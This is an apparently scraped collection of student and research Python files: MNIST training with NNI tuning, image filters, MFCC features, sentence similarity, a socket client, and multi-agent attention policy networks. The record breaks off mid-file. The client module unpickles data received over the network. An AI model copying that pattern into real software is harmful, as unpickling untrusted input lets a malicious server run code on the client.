ep_data = e.get_episode(i)
if ep_data is not None:
results += ep_data
e.close()
output_dir = args.output_dir
os.makedirs(output_dir, exist_ok=True)
output_path = osp.join(output_dir, '{:s}_n_{:d}{:s}.pkl'.format(
args.env, len(results),
'_' + args.comment if args.comment else ''))
print(output_path)
with open(output_path, 'wb') as f:
pickle.dump(results, f, protocol=pickle.HIGHEST_PROTOCOL)
if __name__ == "__main__":
main()
``` |
{
"source": "jiayuanlu/MSRA",
"score": 3
} |
#### File: Lab 2/FNN/mnist_FNN.py
```python
from __future__ import print_function
import argparse
import torch
# torch.cuda.set_device(0)
import nni
import logging
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torchvision
from torchvision import datasets, transforms
from torch.optim.lr_scheduler import StepLR
criterion = nn.CrossEntropyLoss()
import numpy as np
import torchvision.models as models
from torch.utils.tensorboard import SummaryWriter
from nni.utils import merge_parameter
writer = SummaryWriter('logs/mnist_experiment_1')
logger = logging.getLogger('mnist_AutoML')
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
# prelu=nn.PReLU(num_parameters=1)
# self.dropout1 = nn.Dropout2d(0.25)
self.in_hid_1= nn.Linear(784, 512)
self.hid1=nn.LeakyReLU()
self.in_hid_2= nn.Linear(512, 256)
self.hid2=nn.LeakyReLU()
self.in_hid_3= nn.Linear(256, 128)
self.hid3=nn.LeakyReLU()
self.hid_out=nn.Linear(128,10)
def forward(self, data):
x = data.view(-1, 784)
output=self.in_hid_1(x)
# output=self.dropout1(output)
output=self.hid1(output)
output=self.in_hid_2(output)
output=self.hid2(output)
output=self.in_hid_3(output)
output=self.hid3(output)
output=self.hid_out(output)
output = F.log_softmax(output, dim=1)
return output
def train(args, model, device, train_loader, optimizer, epoch):
model.train()
running_loss = 0.0
correct = 0.0
for batch_idx, (data, target) in enumerate(train_loader):
data, target = data.to(device), target.to(device)
optimizer.zero_grad()
output = model(data)
loss = criterion(output, target)
loss.backward()
optimizer.step()
running_loss += loss.item()
pred = output.argmax(dim=1, keepdim=True)
correct += pred.eq(target.view_as(pred)).sum().item()
if batch_idx % args['log_interval'] == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.item()))
if batch_idx != 0:
global_step = (epoch - 1) * len(train_loader) + batch_idx
writer.add_scalar('Loss/train', running_loss / (args['batch_size'] * args['log_interval']), global_step)
writer.add_scalar('Accuracy/train', 100. * correct / (args['batch_size'] * args['log_interval']), global_step)
running_loss = 0.0
correct = 0.0
def test(model, device, test_loader):
model.eval()
test_loss = 0
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.to(device), target.to(device)
output = model(data)
test_loss += criterion(output, target).item()
pred = output.argmax(dim=1, keepdim=True)
correct += pred.eq(target.view_as(pred)).sum().item()
    test_loss /= len(test_loader.dataset)
    test_acc = 100. * correct / len(test_loader.dataset)
    print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
        test_loss, correct, len(test_loader.dataset), test_acc))
    # Return the accuracy so callers (e.g. the NNI reporting below) get a value instead of None.
    return test_acc
def profile(model, device, train_loader):
dataiter = iter(train_loader)
    data, target = next(dataiter)
data, target = data.to(device), target.to(device)
with torch.autograd.profiler.profile(use_cuda=False) as prof:
model(data[0].reshape(1,1,28,28))
print(prof)
def main():
torch.backends.cudnn.enabled = False ###
parser = argparse.ArgumentParser(description='PyTorch MNIST Example')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',
help='input batch size for testing (default: 1000)')
parser.add_argument('--epochs', type=int, default=14, metavar='N',
help='number of epochs to train (default: 14)')
parser.add_argument('--lr', type=float, default=1.0, metavar='LR',
help='learning rate (default: 1.0)')
parser.add_argument('--gamma', type=float, default=0.7, metavar='M',
help='Learning rate step gamma (default: 0.7)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=10, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--save-model', action='store_true', default=True,
help='For Saving the current Model')
args = parser.parse_args()
# use_cuda = not args.no_cuda and torch.cuda.is_available()
# torch.manual_seed(args.seed)
# device = torch.device("cuda" if use_cuda else "cpu")
# kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}
# train_loader = torch.utils.data.DataLoader(
# datasets.MNIST('data', train=True, download=True,
# transform=transforms.Compose([
# transforms.ToTensor(),
# transforms.Normalize((0.1307,), (0.3081,))
# ])),
# batch_size=args.batch_size, shuffle=True, **kwargs)
# test_loader = torch.utils.data.DataLoader(
# datasets.MNIST('data', train=False, transform=transforms.Compose([
# transforms.ToTensor(),
# transforms.Normalize((0.1307,), (0.3081,))
# ])),
# batch_size=args.test_batch_size, shuffle=True, **kwargs)
# dataiter = iter(train_loader)
# images, labels = dataiter.next()
# grid = torchvision.utils.make_grid(images)
# writer.add_image('images', grid, 0)
# model = Net().to(device)
# optimizer = optim.Adadelta(model.parameters(), lr=args.lr)
# images=images.to(device)
# writer.add_graph(model, images)
# scheduler = StepLR(optimizer, step_size=1, gamma=args.gamma)
# print("Start profiling...")
# profile(model, device, train_loader)
# print("Finished profiling.")
# for epoch in range(1, args.epochs + 1):
# train(args, model, device, train_loader, optimizer, epoch)
# test_acc=test(model, device, test_loader)
# scheduler.step()
# # report intermediate result
# nni.report_intermediate_result(test_acc)
# logger.debug('test accuracy %g', test_acc)
# logger.debug('Pipe send intermediate result done.')
# # report final result
# nni.report_final_result(test_acc)
# if args.save_model:
# print("Our model: \n\n", model, '\n')
# print("The state dict keys: \n\n", model.state_dict().keys())
# torch.save(model.state_dict(), "mnist.pt")
# state_dict = torch.load('mnist.pt')
# print(state_dict.keys())
# writer.close()
return args
def NNI(args):
# use_cuda = not args.no_cuda and torch.cuda.is_available()
use_cuda = not args['no_cuda'] and torch.cuda.is_available()
# torch.manual_seed(args.seed)
torch.manual_seed(args['seed'])
device = torch.device("cuda" if use_cuda else "cpu")
kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}
train_loader = torch.utils.data.DataLoader(
datasets.MNIST('data', train=True, download=True,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])),
batch_size=args['batch_size'], shuffle=True, **kwargs)
test_loader = torch.utils.data.DataLoader(
datasets.MNIST('data', train=False, transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])),
batch_size=args['test_batch_size'], shuffle=True, **kwargs)
dataiter = iter(train_loader)
    images, labels = next(dataiter)
grid = torchvision.utils.make_grid(images)
writer.add_image('images', grid, 0)
model = Net().to(device)
optimizer = optim.Adadelta(model.parameters(), lr=args['lr'])
images=images.to(device)
writer.add_graph(model, images)
    scheduler = StepLR(optimizer, step_size=1, gamma=args['gamma'])  # StepLR: decay the learning rate to lr*gamma every step_size epochs
print("Start profiling...")
profile(model, device, train_loader)
print("Finished profiling.")
for epoch in range(1, args['epochs'] + 1):
train(args, model, device, train_loader, optimizer, epoch)
test_acc=test(model, device, test_loader)
scheduler.step()
nni.report_intermediate_result(test_acc)
logger.debug('test accuracy %g', test_acc)
logger.debug('Pipe send intermediate result done.')
nni.report_final_result(test_acc)
if args['save_model']:
print("Our model: \n\n", model, '\n')
print("The state dict keys: \n\n", model.state_dict().keys())
torch.save(model.state_dict(), "mnist.pt")
state_dict = torch.load('mnist.pt')
print(state_dict.keys())
writer.close()
if __name__ == '__main__':
tuner_params = nni.get_next_parameter()
logger.debug(tuner_params)
params = vars(merge_parameter(main(), tuner_params))
print(params)
NNI(params)
``` |
{
"source": "jiayuanlu/XJTU_course",
"score": 2
} |
#### File: Homework1/2D_Gauss_Filter/1_4.py
```python
import numpy as np
from scipy import signal
import cv2
import random
import math
# Bilateral filtering
def getClosenessWeight(sigma_g,H,W):
r,c=np.mgrid[0:H:1,0:W:1]
r -= (H - 1) // 2
c -= int(W - 1) // 2
closeWeight=np.exp(-0.5*(np.power(r,2)+np.power(c,2))/math.pow(sigma_g,2))
return closeWeight
def bfltGray(I,H,W,sigma_g,sigma_d):
    # Build the spatial (closeness) weight kernel
    closenessWeight=getClosenessWeight(sigma_g,H,W)
    # Center of the kernel
    cH = (H - 1) // 2  # // is integer division
    cW = (W - 1) // 2
    # Number of rows and columns of the image
    rows,cols=I.shape
    # Output image of the bilateral filter
bfltGrayImage=np.zeros(I.shape,np.float32)
for r in range(rows):
for c in range(cols):
pixel=I[r][c]
            # Clip the window at the image borders
            rTop=0 if r-cH<0 else r-cH
            rBottom=rows-1 if r+cH>rows-1 else r+cH
            cLeft=0 if c-cW<0 else c-cW
            cRight=cols-1 if c+cW>cols-1 else c+cW
            # Region the kernel acts on
            region=I[rTop:rBottom+1,cLeft:cRight+1]
            # Build the intensity (range) similarity weights
            similarityWeightTemp=np.exp(-0.5*np.power(region-pixel,2.0)/math.pow(sigma_d,2))
            closenessWeightTemp=closenessWeight[rTop-r+cH:rBottom-r+cH+1,cLeft-c+cW:cRight-c+cW+1]
            # Multiply the spatial and range weights
            weightTemp=similarityWeightTemp*closenessWeightTemp
            # Normalize the combined weights
            weightTemp=weightTemp/np.sum(weightTemp)
            # Weighted sum of the neighbourhood values
            bfltGrayImage[r][c]=np.sum(region*weightTemp)
return bfltGrayImage
if __name__=='__main__':  # entry point
    a= cv2.imread('8.jpeg', cv2.IMREAD_UNCHANGED)  # the path must be ASCII-only, otherwise cv2.imread fails
    image1 = cv2.split(a)[0]  # blue channel (OpenCV images are BGR)
    cv2.imshow("8_after1.png",image1)
    image1=image1/255.0
    # Bilateral filtering
    bfltImage=bfltGray(image1,3,3,19,0.2)
    cv2.imshow("filtered image",bfltImage)
cv2.waitKey(0)
cv2.destroyAllWindows()
```
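For a cross-check of the hand-rolled `bfltGray` above, OpenCV ships a built-in bilateral filter. The parameter correspondence is approximate: `sigmaSpace` plays the role of `sigma_g`, `sigmaColor` the role of `sigma_d` but on the 0-255 intensity scale, and `d` is the window diameter. A self-contained sketch on a synthetic noisy image (values are illustrative):
```python
import cv2
import numpy as np

# Synthetic step edge plus noise, so the sketch does not depend on '8.jpeg'.
img = np.full((64, 64), 128, np.uint8)
img[:, 32:] = 200
noisy = np.clip(img + np.random.normal(0, 15, img.shape), 0, 255).astype(np.uint8)
smoothed = cv2.bilateralFilter(noisy, d=5, sigmaColor=40, sigmaSpace=5)
```
The filter smooths the flat regions while the intensity term keeps the edge at column 32 sharp, which a plain Gaussian blur would soften.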
#### File: CVPR/Homework2/grad.py
```python
from PIL import Image
from numpy import *
import matplotlib.pyplot as plt
from scipy.ndimage import filters
im = array(Image.open('1.jpeg').convert('L'))
# im = array(Image.open('1.jpeg'))
sigma = 7  # standard deviation of the Gaussian
imx = zeros(im.shape)
filters.gaussian_filter(im, (sigma, sigma), (0, 1), imx)
imy = zeros(im.shape)
filters.gaussian_filter(im, (sigma, sigma), (1, 0), imy)
plt.subplot(1, 3, 1)
plt.axis('off')
plt.imshow(im, plt.cm.gray)
plt.imsave('Gauss_g1_7.jpg',im)
plt.subplot(1, 3, 2)
plt.axis('off')
plt.imshow(imx, plt.cm.gray)
plt.imsave('Gauss_gx_7.jpg',imx)
plt.subplot(1, 3, 3)
plt.axis('off')
plt.imshow(imy, plt.cm.gray)
plt.imsave('Gauss_gy_7.jpg',imy)
plt.show()
```
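In the calls above, `order=(0, 1)` asks `gaussian_filter` for the first derivative along the x axis (columns) of the Gaussian-smoothed image and `order=(1, 0)` for the derivative along y. The two responses are commonly combined into a gradient magnitude; a short continuation sketch that reuses `imx`, `imy`, and `plt` from the script (the output filename is made up):
```python
import numpy as np

# Gradient magnitude from the two directional responses (not part of the original script).
magnitude = np.sqrt(imx ** 2 + imy ** 2)
plt.imshow(magnitude, plt.cm.gray)
plt.imsave('Gauss_gmag_7.jpg', magnitude)
plt.show()
```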
#### File: DSP/pinyu_mfcc/feature.py
```python
import numpy as np
from python_speech_features import mfcc
def averageEnergy(frames):
energy = np.average(frames * frames, axis=1)
return energy.reshape(-1)
def zeroCrossingRate(frames):
_, lens = frames.shape
delta = np.abs(np.sign(frames[:, 1:]) - np.sign(frames[:, :lens - 1]))
zeroCrossingRate = np.average(delta / 2, axis=1)
return zeroCrossingRate.reshape(-1)
def std(frames):
return np.std(frames, axis=1).reshape(-1)
def kurt(frames):
maximum = np.max(frames, axis=1)
rms = np.sqrt(averageEnergy(frames)) + 1e-6
return (maximum / rms).reshape(-1)
def wave(frames):
rms = np.sqrt(averageEnergy(frames)) + 1e-6
mean = np.average(frames, axis=1)
mean[abs(mean) < 1e-6] = 1e-6
return (rms / mean).reshape(-1)
def grad(frames):
_, lens = frames.shape
delta = np.abs(frames[:, 1:] - frames[:, :lens - 1])
return np.average(delta, axis=1).reshape(-1)
def relate(frames):
lens, _ = frames.shape
product = frames[:lens - 1, :] * frames[1:, :]
return np.average(product, axis=1).reshape(-1)
def compute_mfcc(signal, numcep=13, nfilt=26, split=10):
mfcc_feat = mfcc(signal, samplerate=44100, winlen=0.02, numcep=numcep, nfilt=nfilt, nfft=1024)
length = mfcc_feat.shape[0] / split
step = 0
feature = []
for i in range(split):
start = np.floor(step).astype('int')
end = np.ceil(step + length)
end = int(min(end, mfcc_feat.shape[0]))
feature.append(np.average(mfcc_feat[start:end, :], axis=0))
step += length
feature = np.hstack(feature)
return feature
```
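`compute_mfcc` averages the frame-wise MFCC matrix over `split` equal-length chunks and concatenates the chunk means into one fixed-length vector, here `split * numcep = 10 * 13 = 130` dimensions regardless of signal length. A sketch with a synthetic tone at the hard-coded 44.1 kHz rate (import path depends on how the module is run):
```python
import numpy as np
from feature import compute_mfcc  # assumes the working directory contains feature.py

sr = 44100
t = np.arange(sr) / sr                      # 1 second of audio
signal = 0.1 * np.sin(2 * np.pi * 440 * t)  # 440 Hz tone
feat = compute_mfcc(signal)
print(feat.shape)                           # (130,) = split (10) * numcep (13)
```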
#### File: NLP/Big_Homework/go.py
```python
from sentence_transformers import SentenceTransformer
import sklearn.preprocessing as prepro
import numpy as np
def go(s1: str, s2: str) -> float:
model = SentenceTransformer('multi-qa-MiniLM-L6-cos-v1')
model = model.cuda()
    # Encode both sentences as single-item batches so the embeddings are 2-D arrays.
    sentence_embeddings1 = model.encode([s1])
    sentence_embeddings2 = model.encode([s2])
    a = prepro.normalize(sentence_embeddings1)
    b = prepro.normalize(sentence_embeddings2)
    inner_product = a.dot(b.T)
    return float(inner_product[0, 0])
```
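`go` embeds both sentences with a SentenceTransformer model, L2-normalizes the embeddings, and returns their inner product, i.e. the cosine similarity. A usage sketch; it downloads the `multi-qa-MiniLM-L6-cos-v1` weights on first use and needs a CUDA device because of the `.cuda()` call:
```python
from go import go  # import path depends on the project layout

print(go("How do I reset my password?", "What are the steps to change my password?"))
print(go("How do I reset my password?", "The weather is nice today."))
# Expect a noticeably higher score for the paraphrase pair than for the unrelated pair.
```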
#### File: NLPLarge/communication/Request.py
```python
import socket
import pickle
from .CheckResult import CheckResultPresentation as Result
import client as cli
def getBaseInfo(ip: str):
"""
    Fetch the server's basic info.
    Returns None if the connection fails, otherwise a tuple describing the server.
"""
address = (ip, 11451)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
client.connect(address)
client.sendall(b'444')
data = client.recv(1024)
info = pickle.loads(data)
client.close()
return info
except BaseException:
client.close()
return None
def getServerInfo(ip: str, modelName: str, dataGroupName: str):
"""
    Fetch the model address and the dataset-group address from the server.
"""
address = (ip, 11451)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
client.connect(address)
client.sendall(b'555')
data = client.recv(8)
if b'ok' == data:
key = pickle.dumps(modelName)
client.sendall(key)
data = client.recv(1024)
modelAddr = pickle.loads(data)
else:
client.close()
return None
client.sendall(b'666')
data = client.recv(8)
if b'ok' == data:
key = pickle.dumps(dataGroupName)
client.sendall(key)
data = client.recv(1024)
dataAddr = pickle.loads(data)
else:
client.close()
return None
client.close()
return (modelAddr, dataAddr)
except BaseException:
client.close()
return None
def duplicateResultGet(address: str, lines: list) -> list:
"""
    Send a duplicate-check request for the given lines and return the results.
"""
    # TODO: test stub; the locally computed results below are returned early, so the socket round-trip further down is never reached
import time
time.sleep(1)
tar = list(range(1, 17))
raw = cli.duplicateCheck(lines, tar, 0.6, 3)
parsed = cli.parse(raw, lines)
response = []
for i in parsed.values():
response.append(Result(*i))
return response
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
client.connect(address)
data = pickle.dumps(lines)
client.sendall(data)
data = client.recv(65536)
ret = pickle.loads(data)
client.close()
return [Result(it[0], it[1], it[2]) for it in ret]
except BaseException:
client.close()
return None
``` |
{
"source": "jiayu-ch15/curriculum",
"score": 2
} |
#### File: curriculum/algorithm/mpe_model.py
```python
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from utils.distributions import Bernoulli, Categorical, DiagGaussian
from utils.util import init
import copy
import math
class Policy(nn.Module):
def __init__(self, obs_space, action_space, num_agents, base = None, actor_base=None, critic_base=None, base_kwargs=None, device=torch.device("cpu")):
super(Policy, self).__init__()
self.mixed_obs = False
self.mixed_action = False
self.multi_discrete = False
self.device = device
self.num_agents = num_agents
self.args = base_kwargs
if base_kwargs is None:
base_kwargs = {}
self.actor_base = actor_base
self.critic_base = critic_base
@property
def is_recurrent(self):
return self.args['recurrent']
@property
def is_naive_recurrent(self):
return self.args['naive_recurrent']
def forward(self, share_inputs, inputs, rnn_hxs_actor, rnn_hxs_critic, masks):
raise NotImplementedError
def act(self, agent_id, share_inputs, inputs, rnn_hxs_actor, rnn_hxs_critic, masks, available_actions=None, deterministic=False):
share_inputs = share_inputs.to(self.device)
inputs = inputs.to(self.device)
rnn_hxs_actor = rnn_hxs_actor.to(self.device)
rnn_hxs_critic = rnn_hxs_critic.to(self.device)
masks = masks.to(self.device)
if available_actions is not None:
available_actions = available_actions.to(self.device)
dist = self.actor_base(inputs, self.num_agents)
if deterministic:
action = dist.mode()
else:
action = dist.sample()
action_log_probs = dist.log_probs(action)
action_out = action
action_log_probs_out = action_log_probs
value, rnn_hxs_actor, rnn_hxs_critic = self.critic_base(share_inputs, inputs, self.num_agents, rnn_hxs_actor, masks)
return value, action_out, action_log_probs_out, rnn_hxs_actor, rnn_hxs_critic
def get_value(self, agent_id, share_inputs, inputs, rnn_hxs_actor, rnn_hxs_critic, masks):
share_inputs = share_inputs.to(self.device)
inputs = inputs.to(self.device)
rnn_hxs_actor = rnn_hxs_actor.to(self.device)
rnn_hxs_critic = rnn_hxs_critic.to(self.device)
masks = masks.to(self.device)
value, rnn_hxs_actor, rnn_hxs_critic = self.critic_base(share_inputs, inputs, self.num_agents, rnn_hxs_actor, masks)
return value, rnn_hxs_actor, rnn_hxs_critic
def evaluate_actions(self, agent_id, share_inputs, inputs, rnn_hxs_actor, rnn_hxs_critic, masks, high_masks, action):
share_inputs = share_inputs.to(self.device)
inputs = inputs.to(self.device)
rnn_hxs_actor = rnn_hxs_actor.to(self.device)
rnn_hxs_critic = rnn_hxs_critic.to(self.device)
masks = masks.to(self.device)
high_masks = high_masks.to(self.device)
action = action.to(self.device)
dist = self.actor_base(inputs, self.num_agents)
action_log_probs = dist.log_probs(action)
dist_entropy = dist.entropy()
action_log_probs_out = action_log_probs
dist_entropy_out = dist_entropy.mean()
value, rnn_hxs_actor, rnn_hxs_critic = self.critic_base(share_inputs, inputs, self.num_agents, rnn_hxs_actor, masks)
return value, action_log_probs_out, dist_entropy_out, rnn_hxs_actor, rnn_hxs_critic
# for simple speaker listener
def act_role(self, agent_id, share_inputs, inputs, role, rnn_hxs_actor, rnn_hxs_critic, masks, available_actions=None, deterministic=False):
share_inputs = share_inputs.to(self.device)
inputs = inputs.to(self.device)
rnn_hxs_actor = rnn_hxs_actor.to(self.device)
rnn_hxs_critic = rnn_hxs_critic.to(self.device)
masks = masks.to(self.device)
if available_actions is not None:
available_actions = available_actions.to(self.device)
dist = self.actor_base(inputs, self.num_agents)
if deterministic:
action = dist.mode()
else:
action = dist.sample()
action_log_probs = dist.log_probs(action)
action_out = action
action_log_probs_out = action_log_probs
value, rnn_hxs_actor, rnn_hxs_critic = self.critic_base(share_inputs, inputs, self.num_agents, rnn_hxs_actor, masks)
return value, action_out, action_log_probs_out, rnn_hxs_actor, rnn_hxs_critic
def get_value_role(self, agent_id, share_inputs, inputs, role, rnn_hxs_actor, rnn_hxs_critic, masks):
share_inputs = share_inputs.to(self.device)
inputs = inputs.to(self.device)
rnn_hxs_actor = rnn_hxs_actor.to(self.device)
rnn_hxs_critic = rnn_hxs_critic.to(self.device)
masks = masks.to(self.device)
value, rnn_hxs_actor, rnn_hxs_critic = self.critic_base(share_inputs, inputs, self.num_agents, rnn_hxs_actor, masks)
return value, rnn_hxs_actor, rnn_hxs_critic
def evaluate_actions_role(self, agent_id, share_inputs, inputs, role, rnn_hxs_actor, rnn_hxs_critic, masks, high_masks, action):
share_inputs = share_inputs.to(self.device)
inputs = inputs.to(self.device)
rnn_hxs_actor = rnn_hxs_actor.to(self.device)
rnn_hxs_critic = rnn_hxs_critic.to(self.device)
masks = masks.to(self.device)
high_masks = high_masks.to(self.device)
action = action.to(self.device)
dist = self.actor_base(inputs, self.num_agents)
action_log_probs = dist.log_probs(action)
dist_entropy = dist.entropy()
action_log_probs_out = action_log_probs
dist_entropy_out = dist_entropy.mean()
value, rnn_hxs_actor, rnn_hxs_critic = self.critic_base(share_inputs, inputs, self.num_agents, rnn_hxs_actor, masks)
return value, action_log_probs_out, dist_entropy_out, rnn_hxs_actor, rnn_hxs_critic
class ATTBase_actor(nn.Module):
def __init__(self, num_inputs, action_space, agent_num, model_name, recurrent=False, hidden_size=64):
super(ATTBase_actor, self).__init__()
if recurrent:
num_inputs = hidden_size
init_ = lambda m: init(m, nn.init.orthogonal_, lambda x: nn.init.
constant_(x, 0), np.sqrt(2))
self.agent_num = agent_num
        if model_name in ('simple_spread', 'hard_spread'):
self.actor = ObsEncoder_sp(hidden_size=hidden_size)
elif model_name == 'push_ball':
self.actor = ObsEncoder_pb(hidden_size=hidden_size)
num_actions = action_space.n
self.dist = Categorical(hidden_size, num_actions)
def forward(self, inputs, agent_num):
"""
inputs: [batch_size, obs_dim]
"""
hidden_actor = self.actor(inputs, agent_num)
dist = self.dist(hidden_actor, None)
return dist
class ATTBase_critic(nn.Module):
def __init__(self, num_inputs, agent_num, model_name, recurrent=False, hidden_size=64):
super(ATTBase_critic, self).__init__()
if recurrent:
num_inputs = hidden_size
init_ = lambda m: init(m, nn.init.orthogonal_, lambda x: nn.init.
constant_(x, 0), np.sqrt(2))
self.agent_num = agent_num
        if model_name in ('simple_spread', 'hard_spread'):
self.encoder = ObsEncoder_sp(hidden_size=hidden_size)
elif model_name == 'push_ball':
self.encoder = ObsEncoder_pb(hidden_size=hidden_size)
self.correlation_mat = nn.Parameter(torch.FloatTensor(hidden_size,hidden_size),requires_grad=True)
nn.init.orthogonal_(self.correlation_mat.data, gain=1)
self.critic_linear = nn.Sequential(
init_(nn.Linear(hidden_size, hidden_size)), nn.Tanh(),
nn.LayerNorm(hidden_size),
init_(nn.Linear(hidden_size, 1)))
def forward(self, share_inputs, inputs, agent_num, rnn_hxs, masks):
"""
share_inputs: [batch_size, obs_dim*agent_num]
inputs: [batch_size, obs_dim]
"""
batch_size = inputs.shape[0]
obs_dim = inputs.shape[-1]
f_ii = self.encoder(inputs, agent_num)
obs_beta_ij = torch.matmul(f_ii.view(batch_size,1,-1), self.correlation_mat) # (batch,1,hidden_size)
        # matrix f_ij: encode every agent's observation from the shared input
f_ij = self.encoder(share_inputs.reshape(-1,obs_dim),agent_num)
obs_encoder = f_ij.reshape(batch_size,agent_num,-1) # (batch_size, nagents, hidden_size)
beta = torch.matmul(obs_beta_ij, obs_encoder.permute(0,2,1)).squeeze(1) # (batch_size,nagents)
alpha = F.softmax(beta,dim = 1).unsqueeze(2) # (batch_size,nagents,1)
vi = torch.mul(alpha,obs_encoder)
vi = torch.sum(vi,dim = 1)
value = self.critic_linear(vi)
return value, rnn_hxs, rnn_hxs
class ObsEncoder_sp(nn.Module): # simple spread and hard spread
def __init__(self, hidden_size=100):
super(ObsEncoder_sp, self).__init__()
init_ = lambda m: init(m, nn.init.orthogonal_, lambda x: nn.init.
constant_(x, 0), np.sqrt(2))
self.self_encoder = nn.Sequential(
init_(nn.Linear(4, hidden_size)), nn.Tanh(), nn.LayerNorm(hidden_size))
self.other_agent_encoder = nn.Sequential(
init_(nn.Linear(2, hidden_size)), nn.Tanh(), nn.LayerNorm(hidden_size))
self.landmark_encoder = nn.Sequential(
init_(nn.Linear(3, hidden_size)), nn.Tanh(), nn.LayerNorm(hidden_size))
self.agent_correlation_mat = nn.Parameter(torch.FloatTensor(hidden_size,hidden_size),requires_grad=True)
nn.init.orthogonal_(self.agent_correlation_mat.data, gain=1)
self.landmark_correlation_mat = nn.Parameter(torch.FloatTensor(hidden_size,hidden_size),requires_grad=True)
nn.init.orthogonal_(self.landmark_correlation_mat.data, gain=1)
self.fc = nn.Sequential(
init_(nn.Linear(hidden_size, hidden_size)), nn.Tanh(),
nn.LayerNorm(hidden_size)
)
self.encoder_linear = nn.Sequential(
init_(nn.Linear(hidden_size * 3, hidden_size)), nn.Tanh(),
nn.LayerNorm(hidden_size),
init_(nn.Linear(hidden_size, hidden_size)), nn.Tanh(),
nn.LayerNorm(hidden_size)
)
    # agent_num has to be set manually (it is passed in on every forward call)
def forward(self, inputs, agent_num):
batch_size = inputs.shape[0]
obs_dim = inputs.shape[-1]
landmark_num = agent_num
# landmark_num = int((obs_dim-4)/2)-2*(agent_num-1)
#landmark_num = int((obs_dim-4-4*(agent_num-1))/3)
self_emb = self.self_encoder(inputs[:, :4])
other_agent_emb = []
beta_agent = []
landmark_emb = []
beta_landmark = []
#start = time.time()
agent_beta_ij = torch.matmul(self_emb.view(batch_size,1,-1), self.agent_correlation_mat)
landmark_beta_ij = torch.matmul(self_emb.view(batch_size,1,-1), self.landmark_correlation_mat)
for i in range(agent_num - 1):
other_agent_emb.append(inputs[:, 4+3*landmark_num+2*i:4+3*landmark_num+2*(i+1)])
for i in range(landmark_num):
landmark_emb.append(inputs[:, 4+3*i:4+3*(i+1)])
other_agent_emb = torch.stack(other_agent_emb,dim = 1) #(batch_size,n_agents-1,eb_dim)
other_agent_emb = self.other_agent_encoder(other_agent_emb)
beta_agent = torch.matmul(agent_beta_ij, other_agent_emb.permute(0,2,1)).squeeze(1)
landmark_emb = torch.stack(landmark_emb,dim = 1) #(batch_size,n_agents-1,eb_dim)
landmark_emb = self.landmark_encoder(landmark_emb)
beta_landmark = torch.matmul(landmark_beta_ij, landmark_emb.permute(0,2,1)).squeeze(1)
alpha_agent = F.softmax(beta_agent,dim = 1).unsqueeze(2)
alpha_landmark = F.softmax(beta_landmark,dim = 1).unsqueeze(2)
other_agent_vi = torch.mul(alpha_agent,other_agent_emb)
other_agent_vi = torch.sum(other_agent_vi,dim=1)
landmark_vi = torch.mul(alpha_landmark,landmark_emb)
landmark_vi = torch.sum(landmark_vi,dim=1)
gi = self.fc(self_emb)
f = self.encoder_linear(torch.cat([gi, other_agent_vi, landmark_vi], dim=1))
return f
class ObsEncoder_pb(nn.Module): # push ball
def __init__(self, hidden_size=100):
super(ObsEncoder_pb, self).__init__()
init_ = lambda m: init(m, nn.init.orthogonal_, lambda x: nn.init.
constant_(x, 0), np.sqrt(2))
self.self_encoder = nn.Sequential(
init_(nn.Linear(4, hidden_size)), nn.Tanh(), nn.LayerNorm(hidden_size))
self.landmark_encoder = nn.Sequential(
init_(nn.Linear(3, hidden_size)), nn.Tanh(), nn.LayerNorm(hidden_size))
self.adv_encoder = nn.Sequential(
init_(nn.Linear(2, hidden_size)), nn.Tanh(), nn.LayerNorm(hidden_size))
self.good_encoder = nn.Sequential(
init_(nn.Linear(2, hidden_size)), nn.Tanh(), nn.LayerNorm(hidden_size))
self.adv_correlation_mat = nn.Parameter(torch.FloatTensor(hidden_size,hidden_size),requires_grad=True)
nn.init.orthogonal_(self.adv_correlation_mat.data, gain=1)
self.good_correlation_mat = nn.Parameter(torch.FloatTensor(hidden_size,hidden_size),requires_grad=True)
nn.init.orthogonal_(self.good_correlation_mat.data, gain=1)
self.landmark_correlation_mat = nn.Parameter(torch.FloatTensor(hidden_size,hidden_size),requires_grad=True)
nn.init.orthogonal_(self.landmark_correlation_mat.data, gain=1)
self.fc = nn.Sequential(
init_(nn.Linear(hidden_size, hidden_size)), nn.Tanh(), nn.LayerNorm(hidden_size))
self.encoder_linear = nn.Sequential(
init_(nn.Linear(hidden_size * 4, hidden_size)), nn.Tanh(),
nn.LayerNorm(hidden_size),
init_(nn.Linear(hidden_size, hidden_size)), nn.Tanh(),
nn.LayerNorm(hidden_size))
def forward(self, inputs, agent_num):
batch_size = inputs.shape[0]
obs_dim = inputs.shape[-1]
emb_self = self.self_encoder(inputs[:, :4])
adv_num = agent_num
good_num = agent_num
landmark_num = agent_num
emb_adv = []
beta_adv = []
emb_good = []
beta_good = []
emb_landmark = []
beta_landmark = []
beta_adv_ij = torch.matmul(emb_self.view(batch_size,1,-1), self.adv_correlation_mat)
beta_good_ij = torch.matmul(emb_self.view(batch_size,1,-1), self.good_correlation_mat)
beta_landmark_ij = torch.matmul(emb_self.view(batch_size,1,-1), self.landmark_correlation_mat)
for i in range(adv_num-1):
emb_adv.append(inputs[:, 4+2*i:4+2*(i+1)])
good_offset = 4 + 2*(adv_num-1)
for i in range(good_num):
